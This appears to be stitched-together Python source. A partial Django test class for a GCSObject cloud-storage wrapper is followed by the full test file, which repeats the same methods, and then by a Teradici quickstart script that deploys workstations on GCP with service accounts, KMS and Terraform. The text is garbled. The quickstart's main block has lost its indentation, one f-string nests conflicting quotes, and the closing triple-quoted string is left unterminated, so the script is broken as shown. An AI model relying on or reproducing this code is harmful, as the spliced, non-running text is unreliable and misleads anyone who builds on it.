        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
        gcs_object.client.create_bucket('test')
        # WHEN
        gcs_object.mkdir()
        # THEN
        self.assertTrue(gcs_object.bucket.get_blob('dir1/dir2/'))

    def test_mkdir_doesnt_work_when_object_name_is_taken(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
        gcs_object.client.create_bucket('test')
        gcs_object.mkdir()
        # WHEN + THEN
        self.assertRaises(GCSObjectException, gcs_object.mkdir)

    def test_size_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes.txt'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        # WHEN + THEN
        self.assertEqual(gcs_object.size(), len('content'))

    def test_size_when_object_is_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put files into a bucket
        gcs_object_1.upload_from_string('content')
        gcs_object_2.upload_from_string('content')
        # WHEN + THEN
        self.assertEqual(gcs_object.size(), len('content') * 2)

    def test_rm_deletes_all_files_in_directory_when_object_is_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put files into a bucket
        gcs_object_1.upload_from_string('content')
        gcs_object_2.upload_from_string('content')
        # WHEN
        gcs_object.rm()
        # THEN
        self.assertEqual(gcs_object.size(), 0)

    def test_rm_removes_file_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object.rm()
        # THEN
        # (the original wrapped _monkeypatch_gcsobject twice; once suffices)
        dir_ = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
        self.assertEqual(dir_.size(), 0)

    def test_cp_copies_file_to_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put a file into a bucket
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object_1.cp(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
        # THEN
        self.assertEqual(gcs_object_1.size(), len('content'))
        self.assertEqual(gcs_object.size(), len('content'))

    def test_mv_moves_file_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir_copied/'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put a file into a bucket
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object_1.mv(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
        # THEN
        self.assertEqual(gcs_object_2.size(), len('content'))
        self.assertEqual(gcs_object.exists(), False)

    def test_rename_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/file.jpg'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        gcs_object_renamed = self._monkeypatch_gcsobject(GCSObject('test/renamed.jpg'))
        # WHEN
        gcs_object.rename(gcs_object_renamed)
        # THEN
        self.assertFalse(gcs_object.exists())
        self.assertTrue(gcs_object_renamed.exists())
        self.assertEqual(gcs_object_renamed.size(), len('content'))
| from unittest import skipIf
from decouple import config
from django.test import TestCase, override_settings
from google.api_core.client_options import ClientOptions
from google.auth.credentials import AnonymousCredentials
from google.cloud.exceptions import NotFound
from google.cloud.storage import Blob, Bucket, Client
from physionet.gcs import GCSObject, GCSObjectException
from physionet.settings.base import StorageTypes
# Integration tests run only when a fake GCS server host is configured
# (see the skipIf guard on the test class below).
TEST_GCS_INTEGRATION = config('TEST_GCS_INTEGRATION', default=True, cast=bool)
GCS_HOST = config('GCS_HOST', default=None)
@skipIf(
    (GCS_HOST is None or not TEST_GCS_INTEGRATION),
    'Test GCS-backend integration only on dockerized CI/CD pipeline.',
)
@override_settings(
    STORAGE_TYPE=StorageTypes.GCP,
    DEFAULT_FILE_STORAGE='physionet.storage.MediaStorage',
    STATICFILES_STORAGE='physionet.storage.StaticStorage',
    GCP_STORAGE_BUCKET_NAME='physionet-media',
    GCP_STATIC_BUCKET_NAME='physionet-static',
    GS_PROJECT_ID='test_project_id',
    GCP_BUCKET_LOCATION='us-west1',
)
class TestGCSObject(TestCase):
    """Integration tests for GCSObject against a local fake-GCS server.

    Every GCSObject under test has its storage client monkeypatched to
    talk to the emulator endpoint instead of real GCS.
    """

    @classmethod
    def setUpTestData(cls):
        cls.gcs_server_endpoint = f'http://{config("GCS_HOST", default="gcs")}:4443'
        cls.bucket_name = 'test'
        cls.path = 'physionet/users/admin/profile.jpg'

    def tearDown(self):
        # Buckets persist on the emulator between tests; drop them here.
        try:
            self._clear_gcs_bucket(self.bucket_name)
        except NotFound:
            pass

    def _clear_gcs_bucket(self, name):
        self._get_gcs_client().get_bucket(name).delete(force=True)

    def _get_gcs_client(self):
        # Anonymous credentials are sufficient for the emulator endpoint.
        return Client(
            project="test_project_id",
            credentials=AnonymousCredentials(),
            client_options=ClientOptions(api_endpoint=self.gcs_server_endpoint),
        )

    def _monkeypatch_gcsobject(self, gcs_object):
        # Redirect the object's cached storage client at the emulator.
        gcs_object._storage._client = self._get_gcs_client()
        return gcs_object

    @override_settings(STORAGE_TYPE=StorageTypes.LOCAL)
    def test_init_raises_exception_when_storage_types_is_local(self):
        self.assertRaises(GCSObjectException, GCSObject, self.path)

    @override_settings(STORAGE_TYPE=StorageTypes.GCP)
    def test_init_when_storage_type_is_gcp(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertEqual(gcs_object.bucket.name, 'physionet')
        self.assertEqual(gcs_object._object_name, 'users/admin/profile.jpg')

    def test_repr(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertEqual(
            repr(gcs_object),
            'GCSObject(Bucket=physionet, Object="users/admin/profile.jpg")',
        )

    def test_bucket_property_return_bucket_proper_object(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertIsInstance(gcs_object.bucket, Bucket)
        self.assertEqual(gcs_object.bucket.name, 'physionet')

    def test_blob_property_return_proper_object(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertIsInstance(gcs_object.blob, Blob)
        self.assertEqual(gcs_object.blob.name, 'users/admin/profile.jpg')

    def test_mkdir_makes_directories(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
        gcs_object.client.create_bucket('test')
        # WHEN
        gcs_object.mkdir()
        # THEN
        self.assertTrue(gcs_object.bucket.get_blob('dir1/dir2/'))

    def test_mkdir_doesnt_work_when_object_name_is_taken(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
        gcs_object.client.create_bucket('test')
        gcs_object.mkdir()
        # WHEN + THEN
        self.assertRaises(GCSObjectException, gcs_object.mkdir)

    def test_size_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes.txt'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        # WHEN + THEN
        self.assertEqual(gcs_object.size(), len('content'))

    def test_size_when_object_is_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put files into a bucket
        gcs_object_1.upload_from_string('content')
        gcs_object_2.upload_from_string('content')
        # WHEN + THEN
        self.assertEqual(gcs_object.size(), len('content') * 2)

    def test_rm_deletes_all_files_in_directory_when_object_is_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put files into a bucket
        gcs_object_1.upload_from_string('content')
        gcs_object_2.upload_from_string('content')
        # WHEN
        gcs_object.rm()
        # THEN
        self.assertEqual(gcs_object.size(), 0)

    def test_rm_removes_file_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object.rm()
        # THEN
        # NOTE(review): the double _monkeypatch_gcsobject wrap is redundant
        # (second call is a no-op); one wrap would suffice.
        dir_ = self._monkeypatch_gcsobject(self._monkeypatch_gcsobject(GCSObject('test/dir/')))
        self.assertEqual(dir_.size(), 0)

    def test_cp_copies_file_to_directory(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put a file into a bucket
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object_1.cp(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
        # THEN
        self.assertEqual(gcs_object_1.size(), len('content'))
        self.assertEqual(gcs_object.size(), len('content'))

    def test_mv_moves_file_when_object_is_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
        gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
        gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir_copied/'))
        # create a bucket
        gcs_object.client.create_bucket('test')
        # put a file into a bucket
        gcs_object.upload_from_string('content')
        # WHEN
        gcs_object_1.mv(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
        # THEN
        self.assertEqual(gcs_object_2.size(), len('content'))
        self.assertEqual(gcs_object.exists(), False)

    def test_rename_file(self):
        # GIVEN
        gcs_object = self._monkeypatch_gcsobject(GCSObject('test/file.jpg'))
        gcs_object.client.create_bucket('test')
        gcs_object.upload_from_string('content')
        gcs_object_renamed = self._monkeypatch_gcsobject(GCSObject('test/renamed.jpg'))
        # WHEN
        gcs_object.rename(gcs_object_renamed)
        # THEN
        self.assertFalse(gcs_object.exists())
        self.assertTrue(gcs_object_renamed.exists())
        self.assertEqual(gcs_object_renamed.size(), len('content'))
|
#!/usr/bin/env python3
# Copyright (c) 2019 Teradici Corporation
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import base64
import datetime
import importlib
import json
import os
import re
import shutil
import site
import subprocess
import sys
import textwrap
import time
import casmgr
import interactive
# Minimum versions for required Python packages (None = any version).
REQUIRED_PACKAGES = {
    'google-api-python-client': None,
    'grpc-google-iam-v1': None,
    'google-cloud-kms': "2.0.0"
}

# Service Account ID of the service account to create
SA_ID = 'cas-manager'
SA_ROLES = [
    'roles/editor',
    'roles/cloudkms.cryptoKeyEncrypterDecrypter'
]

# NOTE(review): raises KeyError when GOOGLE_CLOUD_PROJECT is unset; Cloud
# Shell normally provides it — confirm for other environments.
PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT']
REQUIRED_APIS = [
    'deploymentmanager.googleapis.com',
    'cloudkms.googleapis.com',
    'cloudresourcemanager.googleapis.com',
    'compute.googleapis.com',
    'dns.googleapis.com',
    'iam.googleapis.com',
]

# Compact UTC timestamp used to make deployment/connector names unique.
iso_time = datetime.datetime.utcnow().isoformat(timespec='seconds').replace(':','').replace('-','') + 'Z'
DEPLOYMENT_NAME = 'quickstart_deployment_' + iso_time
CONNECTOR_NAME = 'quickstart_cac_' + iso_time

# User entitled to workstations
ENTITLE_USER = 'Administrator'

HOME = os.path.expanduser('~')
TERRAFORM_BIN_DIR = f'{HOME}/bin'
TERRAFORM_BIN_PATH = TERRAFORM_BIN_DIR + '/terraform'
TERRAFORM_VER_PATH = '../deployments/gcp/single-connector/versions.tf'
CFG_FILE_PATH = 'gcp-cloudshell-quickstart.cfg'
DEPLOYMENT_PATH = 'deployments/gcp/single-connector'

# All of the following paths are relative to the deployment directory, DEPLOYMENT_PATH
TF_VARS_REF_PATH = 'terraform.tfvars.sample'
TF_VARS_PATH = 'terraform.tfvars'
SECRETS_DIR = 'secrets'
GCP_SA_KEY_PATH = SECRETS_DIR + '/gcp_service_account_key.json'
SSH_KEY_PATH = SECRETS_DIR + '/cas_mgr_admin_id_rsa'
CAS_MGR_DEPLOYMENT_SA_KEY_PATH = SECRETS_DIR + '/cas_mgr_deployment_sa_key.json.encrypted'

# Types of workstations
WS_TYPES = ['scent', 'gcent', 'swin', 'gwin']
def ensure_requirements():
    """Abort unless a GCP project is configured, then prepare Python deps and Terraform."""
    if not PROJECT_ID:
        for message in (
            'The PROJECT property has not been set.',
            'Please run "gcloud config set project [PROJECT_ID]" to set the project.',
            'See: https://cloud.google.com/sdk/gcloud/reference/config/set',
            '',
        ):
            print(message)
        sys.exit(1)
    ensure_required_packages()
    import_modules()
    ensure_terraform()
def ensure_required_packages():
    """A function that ensures the correct version of Python packages are installed.

    The function first checks if the required packages are installed. If a package is
    installed, the required version number will then be checked. It will next prompt
    the user to update or install the required packages.
    """
    packages_to_install_list = []
    for package, required_version in REQUIRED_PACKAGES.items():
        check_cmd = f'{sys.executable} -m pip show {package}'
        output = subprocess.run(check_cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')
        # If a package is not found, skip version checking and simply install the latest package
        if not output:
            packages_to_install_list.append(package)
        elif required_version is not None:
            # Second line outputs the version of the specified package
            current_version = output.splitlines()[1].split(' ')[-1]
            # Convert the string into a tuple of numbers for comparison.
            # NOTE(review): assumes purely numeric versions — a pre-release
            # tag like '2.0.0rc1' would raise ValueError; confirm acceptable.
            current_version_tuple = tuple( map(int, current_version.split('.')) )
            required_version_tuple = tuple( map(int, required_version.split('.')) )
            if current_version_tuple < required_version_tuple:
                packages_to_install_list.append(package)
    if packages_to_install_list:
        # Convert the list to a string of packages delimited by a space
        packages_to_install = " ".join(packages_to_install_list)
        install_cmd = f'{sys.executable} -m pip install --upgrade {packages_to_install} --user'
        install_permission = input(
            'One or more of the following Python packages are outdated or missing:\n'
            f' {packages_to_install}\n\n'
            'The script can install these packages in the user\'s home directory using the following command:\n'
            f' {install_cmd}\n'
            'Proceed? (y/n)? ').strip().lower()
        if install_permission not in ('y', 'yes'):
            print('Python packages are required for deployment. Exiting...')
            sys.exit(1)
        subprocess.check_call(install_cmd.split(' '))
        # Refresh sys.path to detect new modules in user's home directory.
        importlib.reload(site)
def import_modules():
    """A function that dynamically imports required Python packages.

    Imports are executed into globals() so the rest of the module can use
    them after the packages have just been pip-installed.
    """
    # Global calls for import statements are required to avoid module not found error
    import_required_packages = '''\
    import googleapiclient.discovery
    from google.cloud import kms
    from google.api_core import exceptions as google_exc
    '''
    # Recommended to clear cache after installing python packages for dynamic imports
    importlib.invalidate_caches()
    exec(textwrap.dedent(import_required_packages), globals())
    print('Successfully imported required Python packages.')
def ensure_terraform():
    """A function that ensures the required Terraform version is installed.

    The function first checks if the required Terraform version is installed in
    the user's system. If Terraform is not installed, it will prompt the user to
    install Terraform in the user's home directory.
    """
    global TERRAFORM_BIN_PATH
    path = shutil.which('terraform')
    # Reference versions.tf file for the required version
    with open(TERRAFORM_VER_PATH,"r") as f:
        data = f.read()
        required_version = re.search(r'\">=\s([\d.]+)\"', data).group(1)
    if path:
        cmd = 'terraform -v'
        # Run the command 'terraform -v' and use the first line as the Terraform version
        terraform_version = subprocess.run(cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()[0]
        print(f'Found {terraform_version} in {path}.')
        # Use regex to parse the version number from string (i.e. 0.12.18)
        current_version = re.search(r'Terraform\s*v([\d.]+)', terraform_version).group(1)
        # Convert the string into a tuple of numbers for comparison
        current_version_tuple = tuple( map(int, current_version.split('.')) )
        required_version_tuple = tuple( map(int, required_version.split('.')) )
        if current_version_tuple >= required_version_tuple:
            # Installed version satisfies the requirement; use it as-is.
            TERRAFORM_BIN_PATH = path
            return
    install_permission = input(
        f'This system is missing Terraform version >= {required_version}.\n'
        f'Proceed to download and install Terraform in {TERRAFORM_BIN_DIR} (y/n)? ').strip().lower()
    if install_permission not in ('y', 'yes'):
        print('Terraform is required for deployment. Exiting...')
        sys.exit(1)
    install_cmd = f'{sys.executable} install-terraform.py {TERRAFORM_BIN_DIR}'
    subprocess.run(install_cmd.split(' '), check=True)
def quickstart_config_read(cfg_file):
    """Parse a quickstart config file of 'key: value' lines into a dict.

    Lines starting with '#' and blank lines are skipped.  Values may
    themselves contain ':' (e.g. URLs or API tokens), so only the first
    colon on a line is treated as the key/value separator.
    """
    cfg_data = {}
    with open(cfg_file, 'r') as f:
        for line in f:
            if line[0] in ('#', '\n'):
                continue
            # split(':', 1): the original split(':') raised ValueError on
            # any value containing a colon.
            key, value = map(str.strip, line.split(':', 1))
            cfg_data[key] = value
    return cfg_data
def service_account_find(email):
    """Return the project's service account matching *email*, or None."""
    service_accounts = iam_service.projects().serviceAccounts().list(
        name = f'projects/{PROJECT_ID}',
    ).execute()
    # An empty response means the project has no service accounts at all.
    if not service_accounts:
        return
    for account in service_accounts['accounts']:
        if account['email'] == email:
            return account
def service_account_create(email):
    """Return the service account *email*, creating it if it does not exist."""
    print('Creating Service Account...')
    service_account = service_account_find(email)
    if service_account:
        print(f' Service account {email} already exists.')
        # The service account limit check is placed here so that the script doesn't
        # unfortunately exit after the user enters their configurations if error, but
        # the key will be created later to avoid reaching the limit, in case
        # something goes wrong and the script exits before the key is used.
        service_account_create_key_limit_check(service_account)
        return service_account
    service_account = iam_service.projects().serviceAccounts().create(
        name = 'projects/' + PROJECT_ID,
        body = {
            'accountId': SA_ID,
            'serviceAccount': {
                'displayName': SA_ID,
                'description': 'Account used by CAS Manager to manage PCoIP workstations.',
            }
        }
    ).execute()
    print(' Created service account: ' + service_account['email'])
    return service_account
def service_account_create_key(service_account, filepath):
    """Create a new JSON key for *service_account*, write it to *filepath*.

    Returns the decoded key as a dict.
    """
    # Fixed: message tense ('Creating', the key does not exist yet) and the
    # f-string no longer reuses single quotes inside the replacement field,
    # which is a SyntaxError before Python 3.12.
    print(f'Creating key for {service_account["email"]}...')
    key = iam_service.projects().serviceAccounts().keys().create(
        name = 'projects/-/serviceAccounts/' + service_account['email'],
        body = {},
    ).execute()
    # privateKeyData is base64-encoded JSON key material.
    key_data = base64.b64decode(key['privateKeyData'])
    with open(filepath, 'wb') as keyfile:
        keyfile.write(key_data)
    print(' Key written to ' + filepath)
    return json.loads(key_data.decode('utf-8'))
def service_account_create_key_limit_check(service_account):
    """Exit the script if the service account is at GCP's 10-key limit."""
    # Double quotes inside the replacement field: reusing the outer quote
    # in an f-string is a SyntaxError before Python 3.12.
    print(f' Checking number of keys owned by {service_account["email"]}... ', end='')
    keys = iam_service.projects().serviceAccounts().keys().list(
        name='projects/-/serviceAccounts/' + service_account['email']
    ).execute()['keys']
    # Only user-managed keys count against the 10-key limit.
    user_managed_keys = list(filter(lambda k: (k['keyType'] == 'USER_MANAGED'), keys))
    print(f'{len(user_managed_keys)}/10')
    if len(user_managed_keys) >= 10:
        # (dropped the pointless f-prefix on the constant string below)
        print(' ERROR: The service account has reached the limit of the number of keys it can create.',
              ' Please see: https://cloud.google.com/iam/docs/creating-managing-service-account-keys',
              'Exiting script...', sep='\n')
        sys.exit(1)
def iam_policy_update(service_account, roles):
    """Grant each role in *roles* to *service_account* on the project.

    Fetches the current IAM policy, appends one binding per role, and
    writes the policy back.  Returns the updated policy.
    """
    policy = crm_service.projects().getIamPolicy(
        resource = PROJECT_ID,
        body = {},
    ).execute()
    print('Adding roles:')
    for role in roles:
        print(f' {role}...')
        binding = {
            'role': role,
            # Double quotes inside the replacement field: reusing the outer
            # quote in an f-string is a SyntaxError before Python 3.12.
            'members': [f'serviceAccount:{service_account["email"]}'],
        }
        policy['bindings'].append(binding)
    policy = crm_service.projects().setIamPolicy(
        resource = PROJECT_ID,
        body = {
            'policy': policy
        }
    ).execute()
    return policy
def apis_enable(apis):
    """Enable each required GCP service API via the gcloud CLI."""
    print('Enabling APIs:')
    # Using shell command, no Python Google Cloud Client library support
    base_cmd = ['gcloud', 'services', 'enable']
    for api in apis:
        print(f' {api}...')
        subprocess.run(base_cmd + [api], check=True)
def ssh_key_create(path):
    """Generate a passwordless RSA SSH keypair at *path* (plus path + '.pub')."""
    print('Creating SSH key...')
    # Explicit argv list: the original smuggled the empty passphrase in via
    # a trailing space and str.split(' '), which is fragile and easy to
    # break when editing. '-N' '' requests no passphrase.
    ssh_cmd = ['ssh-keygen', '-f', path, '-t', 'rsa', '-q', '-N', '']
    subprocess.run(ssh_cmd, check=True)
# Creates a new .tfvar based on the .tfvar.sample file
def tf_vars_create(ref_file_path, tfvar_file_path, settings):
    """Render a terraform.tfvars file from the sample file using *settings*.

    Commented-out optional variables in the sample are uncommented when a
    matching key exists in *settings*; every non-blank assignment line has
    its value substituted.  Prompts before overwriting an existing file.
    """
    if os.path.exists(tfvar_file_path):
        overwrite = input("Found an existing .tfvar file, overwrite (y/n)? ").strip().lower()
        if overwrite not in ('y', 'yes'):
            print(f'{tfvar_file_path} already exists. Exiting...')
            sys.exit(1)
    with open(ref_file_path, 'r') as ref_file, open(tfvar_file_path, 'w') as out_file:
        for line in ref_file:
            if line[0] == '#':
                # Uncomment optional variables that appear in settings.
                for k in settings.keys():
                    # Raw string + re.escape: the original used a non-raw
                    # pattern (invalid "\s" escape warning) and interpolated
                    # the key into the regex unescaped.
                    pattern = r"^#\s*(" + re.escape(k) + r")\s*="
                    if re.search(pattern, line.strip()):
                        line = f'{k} = "{settings[k]}"\n'
            elif line[0] != '\n':
                key = line.split('=')[0].strip()
                line = f'{key} = "{settings[key]}"\n'
            out_file.write(line)
if __name__ == '__main__':
ensure_requirements()
print('Setting GCP project...')
sa_email = f'{SA_ID}@{PROJECT_ID}.iam.gserviceaccount.com'
iam_service = googleapiclient.discovery.build('iam', 'v1')
crm_service = googleapiclient.discovery.build('cloudresourcemanager', 'v1')
apis_enable(REQUIRED_APIS)
sa = service_account_create(sa_email)
iam_policy_update(sa, SA_ROLES)
print('GCP project setup complete.\n')
cfg_data = interactive.configurations_get(PROJECT_ID, WS_TYPES, ENTITLE_USER)
print('Preparing local requirements...')
os.chdir('../')
os.chdir(DEPLOYMENT_PATH)
# Paths passed into terraform.tfvars should be absolute paths
cwd = os.getcwd() + '/'
try:
print(f'Creating directory {SECRETS_DIR} to store secrets...')
os.mkdir(SECRETS_DIR, 0o700)
except FileExistsError:
print(f'Directory {SECRETS_DIR} already exists.')
ssh_key_create(SSH_KEY_PATH)
print('Local requirements setup complete.\n')
print('Setting CAS Manager...')
mycasmgr = casmgr.CASManager(cfg_data.get('api_token'))
# TODO: Add a proper clean up of GCP IAM resources so we don't have to move the
# service account creation to here after the rest of the GCP setup
sa_key = service_account_create_key(sa, GCP_SA_KEY_PATH)
print(f'Creating deployment {DEPLOYMENT_NAME}...')
deployment = mycasmgr.deployment_create(DEPLOYMENT_NAME, cfg_data.get('reg_code'))
mycasmgr.deployment_add_gcp_account(sa_key, deployment)
print('Creating CAS Manager API key...')
cas_mgr_deployment_key = mycasmgr.deployment_key_create(deployment)
print('CAS Manager setup complete.\n')
print('Encrypting secrets...')
days90 = 7776000
kms_client = kms.KeyManagementServiceClient()
parent = f"projects/{PROJECT_ID}/locations/{cfg_data.get("gcp_region")}"
key_ring_id = 'cloud_deployment_scripts'
key_ring_init = {}
try:
key_ring = kms_client.create_key_ring(request={'parent': parent, 'key_ring_id': key_ring_id, 'key_ring': key_ring_init})
print(f'Created Key Ring {key_ring.name}')
except google_exc.AlreadyExists:
print(f'Key Ring {key_ring_id} already exists. Using it...')
parent = kms_client.key_ring_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id)
crypto_key_id = 'quickstart_key'
crypto_key_init = {
'purpose': kms.CryptoKey.CryptoKeyPurpose.ENCRYPT_DECRYPT,
'rotation_period': {'seconds': days90},
'next_rotation_time': {'seconds': int(time.time()) + days90},
}
try:
crypto_key = kms_client.create_crypto_key(request={'parent': parent, 'crypto_key_id': crypto_key_id, 'crypto_key': crypto_key_init})
print(f'Created Crypto Key {crypto_key.name}')
except google_exc.AlreadyExists:
print(f'Crypto Key {crypto_key_id} already exists. Using it...')
key_name = kms_client.crypto_key_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id, crypto_key_id)
def kms_encode(key, text, base64_encoded=False):
encrypted = kms_client.encrypt(request={'name': key, 'plaintext': text.encode('utf-8')})
if base64_encoded:
return base64.b64encode(encrypted.ciphertext).decode('utf-8')
return encrypted.ciphertext
cfg_data['ad_password'] = kms_encode(key_name, cfg_data.get('ad_password'), True)
cfg_data['reg_code'] = kms_encode(key_name, cfg_data.get('reg_code'), True)
cas_mgr_deployment_key_encrypted = kms_encode(key_name, json.dumps(cas_mgr_deployment_key))
print('Done encrypting secrets.')
print('Creating CAS Manager Deployment Service Account Key...')
with open(CAS_MGR_DEPLOYMENT_SA_KEY_PATH, 'wb+') as keyfile:
keyfile.write(cas_mgr_deployment_key_encrypted)
print(' Key written to ' + CAS_MGR_DEPLOYMENT_SA_KEY_PATH)
print('Deploying with Terraform...')
#TODO: refactor this to work with more types of deployments
settings = {
'gcp_credentials_file': cwd + GCP_SA_KEY_PATH,
'gcp_region': cfg_data.get('gcp_region'),
'gcp_zone': cfg_data.get('gcp_zone'),
'kms_cryptokey_id': key_name,
'dc_admin_password': cfg_data.get('ad_password'),
'safe_mode_admin_password': cfg_data.get('ad_password'),
'ad_service_account_password': cfg_data.get('ad_password'),
'cac_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'win_gfx_instance_count': cfg_data.get('gwin'),
'win_std_instance_count': cfg_data.get('swin'),
'centos_gfx_instance_count': cfg_data.get('gcent'),
'centos_std_instance_count': cfg_data.get('scent'),
'centos_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'pcoip_registration_code': cfg_data.get('reg_code'),
'cas_mgr_deployment_sa_file': cwd + CAS_MGR_DEPLOYMENT_SA_KEY_PATH
}
# update tfvar
tf_vars_create(TF_VARS_REF_PATH, TF_VARS_PATH, settings)
tf_cmd = f'{TERRAFORM_BIN_PATH} init'
subprocess.run(tf_cmd.split(' '), check=True)
tf_cmd = f'{TERRAFORM_BIN_PATH} apply -auto-approve'
subprocess.run(tf_cmd.split(' '), check=True)
comp_proc = subprocess.run([TERRAFORM_BIN_PATH,'output','cac-public-ip'],
check=True,
stdout=subprocess.PIPE)
cac_public_ip = comp_proc.stdout.decode().split('"')[1]
print('Terraform deployment complete.\n')
# To update the auth_token used by the session header for the API call
# with the one from the deployment key in case the API Token expires
mycasmgr.deployment_signin(cas_mgr_deployment_key)
# Add existing workstations
for t in WS_TYPES:
for i in range(int(cfg_data.get(t))):
hostname = f'{t}-{i}'
print(f'Adding "{hostname}" to CAS Manager...')
mycasmgr.machine_add_existing(
hostname,
PROJECT_ID,
cfg_data.get('gcp_zone'),
deployment
)
# Loop until Administrator user is found in CAS Manager
while True:
entitle_user = mycasmgr.user_get(ENTITLE_USER, deployment)
if entitle_user:
break
print(f'Waiting for user "{ENTITLE_USER}" to be synced. Retrying in 10 seconds...')
time.sleep(10)
# Add entitlements for each workstation
machines_list = mycasmgr.machines_get(deployment)
for machine in machines_list:
print(f'Assigning workstation "{machine['machineName']}" to user "{ENTITLE_USER}"...')
mycasmgr.entitlement_add(entitle_user, machine)
print('\nQuickstart deployment finished.\n')
print('')
next_steps = f"""
Next steps:
- Connect to a workstation:
1. from a PCoIP client, connect to the Cloud Access Connector at {cac_public_ip}
2. sign in with the "{ENTITLE_USER}" user credentials
3. When connecting to a workstation immediately after this script completes,
the workstation (especially graphics ones) may still be setting up. You may
see "Remote Desktop is restarting..." in the client. Please wait a few
minutes or reconnect if it times out.
- Add additional workstations:
1. Log in to https://cas.teradici.com
2. Click on "Workstations" in the left panel, select "Create new remote
workstation" from the "+" button
3. Select connector "quickstart_cac_<timestamp>"
4. Fill in the form according to your preferences. Note that the following
values must be used for their respective fields:
Region: "{cfg_data.get('gcp_region')}"
Zone: "{cfg_data.get('gcp_zone')}"
Network: "vpc-cas"
Subnetowrk: "subnet-ws"
Domain name: "example.com"
Domain service account: "cas_ad_admin"
Service account password: <set by you at start of script>
5. Click **Create**
- Clean up:
1. Using GCP console, delete all workstations created by CAS Manager
web interface and manually created workstations. Resources not created by
the Terraform scripts must be manually removed before Terraform can
properly destroy resources it created.
2. In GCP cloudshell, change directory using the command "cd ~/cloudshell_open/cloud_deployment_scripts/{DEPLOYMENT_PATH}"
3. Remove resources deployed by Terraform using the command "terraform destroy". Enter "yes" when prompted.
"{'terraform' if TERRAFORM_BIN_PATH == shutil.which('terraform') else TERRAFORM_BIN_PATH} destroy"
